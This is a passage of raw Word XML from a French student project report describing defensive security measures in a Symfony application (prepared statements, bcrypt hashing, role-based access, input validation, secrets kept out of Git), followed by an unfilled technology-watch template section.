              <w:t>Validation des entrées côté serveur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65CE7421" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="008E02C2" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve">Symfony </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>Validator</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve"> avec contraintes (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>NotBlank</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>, Email, Length, Regex) + typage strict des entités Doctrine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3C49FE10" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="008E02C2" w:rsidRDefault="003239D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>✅ Mis en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="7A32BE62" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3610" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2D5FF58E" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:t>Exposition de données sensibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3156" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="555C1157" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="008E02C2" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
            <w:pPr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>Variables d'environnement dans .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t>env.local</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:t xml:space="preserve"> (non versionné), secrets de base </w:t>
            </w:r>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>de données absents du dépôt Git</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2260" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="48121EC1" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRPr="008E02C2" w:rsidRDefault="003239D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E02C2">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="595959" w:themeColor="text2" w:themeTint="A6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>✅ Mis en place</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="07BEA181" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="7C0C0E26" w14:textId="77777777" w:rsidR="008E02C2" w:rsidRDefault="008E02C2" w:rsidP="008E02C2">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EE4806" w14:textId="5F7B43F5" w:rsidR="008E02C2" w:rsidRDefault="008E02C2" w:rsidP="008E02C2">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:r w:rsidRPr="008E02C2">
        <w:t>7.</w:t>
      </w:r>
      <w:r>
        <w:t>3.1</w:t>
      </w:r>
      <w:r w:rsidRPr="008E02C2">
        <w:t xml:space="preserve"> 7.2.1 Description technique des protections </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>back</w:t>
      </w:r>
      <w:r w:rsidRPr="008E02C2">
        <w:t>-end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3746748E" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="70" w:name="_Toc233817793"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Protection contre les injections SQL</w:t>
      </w:r>
      <w:bookmarkEnd w:id="70"/>
    </w:p>
    <w:p w14:paraId="24F24940" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Toutes les requêtes en base de données passent par Doctrine ORM, qui utilise des requêtes préparées (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>prepared</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>statements</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">). Les valeurs utilisateur sont transmises via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setParameter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">() et jamais concaténées directement dans une chaîne SQL. Le </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>QueryBuilder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> applique ce mécanisme sur toutes les méthodes personnalisées des repositories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF0D1AC" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="1AA8A0E2" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc233817794"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Authentification et hachage des mots de passe</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="5230B912" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="008E02C2">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Les mots de passe sont hachés avec </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> via Symfony </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PasswordHasher</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> avant d'être stockés en base de données. Lors de la connexion, Symfony compare l'empreinte stockée au mot de passe saisi sans jamais le déchiffrer. La gestion des sessions est assurée par le pare-feu Symfony (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>security.yaml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), qui authentifie l'utilisateur et maintient sa session de manière sécurisée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3238BF82" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="46179B25" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc233817795"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Contrôle des accès par rôle</w:t>
      </w:r>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w14:paraId="12A7A7C5" w14:textId="2BE1D04A" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00AC4BBF">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L'application distingue deux rôles : ROLE_USER pour les utilisateurs et ROLE_ADMIN pour l'administrateur. Les contrôleurs d'administration sont protégés par l'attribut #[IsGranted('ROLE_ADMIN')], qui déclenche une erreur 403 si l'utilisateur connecté n'a pas ce rôle. Tout utilisateur non authentifié est automatiquement redirigé vers la page de connexion par le pare-feu Symfony.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DBF56D" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="45632DAA" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre3"/>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc233817796"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2E5FA3"/>
        </w:rPr>
        <w:t>Validation côté serveur et protection des données sensibles</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
    </w:p>
    <w:p w14:paraId="08DBAF26" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003239D4" w:rsidP="00AC4BBF">
      <w:pPr>
        <w:spacing w:before="120"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Le composant </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Validator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de Symfony applique les contraintes définies sur les entités (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NotBlank</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Email, Length, Regex) indépendamment du client. Les données sensibles (identifiants de base de données, clé d'application) sont stockées dans le fichier .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>env.local</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, qui est exclu du dépôt Git via .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gitignore</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>. Aucune donnée confidentielle n'est versionnée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDAF6DB" w14:textId="77777777" w:rsidR="003A6B7F" w:rsidRDefault="003A6B7F"/>
    <w:p w14:paraId="613D1649" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8CC98E" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc233817797"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>8. VEILLE TECHNOLOGIQUE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
    </w:p>
    <w:p w14:paraId="571D4106" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:before="80" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>💡 Décrivez la veille technologique menée durant le projet. Vous devez démontrer une démarche active de surveillance des risques de sécurité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18546783" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc233817798"/>
      <w:r>
        <w:t>8.1 Outils et sources de veille utilisés</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w14:paraId="7913C861" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Listez les sources consultées (CERT-FR, OWASP, CVE, newsletters, sites techniques…).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FB2F7F" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source 1 : [nom + URL]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D59D128" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source 2 : …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B9EA50" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Source 3 : …</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5EBF6D" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39E29390" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc233817799"/>
      <w:r>
        <w:t>8.2 Exemple de veille</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>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05"/>
        <w:gridCol w:w="3160"/>
        <w:gridCol w:w="3161"/>
      </w:tblGrid>
      <w:tr w:rsidR="002A5F4C" w14:paraId="74A58ABE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="4443C26B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Vulnérabilité / CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="76866B2B" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Impact sur le projet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3161" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
          </w:tcPr>
          <w:p w14:paraId="1DCA4AD5" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Correction / Parade appliquée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="4AA67EFB" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0DC8922A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnérabilité </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>front-end</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t xml:space="preserve"> (ex : XSS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="629C018A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>Décrivez l'impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3161" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="15F3F263" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>Décrivez la correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A5F4C" w14:paraId="460F73A6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2705" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="706233CE" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t xml:space="preserve">Vulnérabilité </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>back-end</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t xml:space="preserve"> (ex : </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3160" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="026A50C3" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>Décrivez l'impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3161" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="BBBBBB"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="43A9041C" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="888888"/>
              </w:rPr>
              <w:t>Décrivez la correction</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59D4911A" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACF7E91" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre2"/>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc233817800"/>
      <w:r>
        <w:t>8.3 Synthèse de la veille</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
    </w:p>
    <w:p w14:paraId="15375EA4" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="555555"/>
        </w:rPr>
        <w:t>Comment cette veille a-t-elle influencé vos choix de développement ? Quels apprentissages en retenez-vous ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08366484" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="29BAD281" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="7F2A5B54" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="002A5F4C"/>
    <w:p w14:paraId="16FE95C3" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC41136" w14:textId="77777777" w:rsidR="002A5F4C" w:rsidRDefault="003239D4">
      <w:pPr>
        <w:pStyle w:val="Titre1"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc233817801"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>9. DÉMARCHE DE RÉSOLUTION DE PROBLÈME</w:t>
      </w:r>
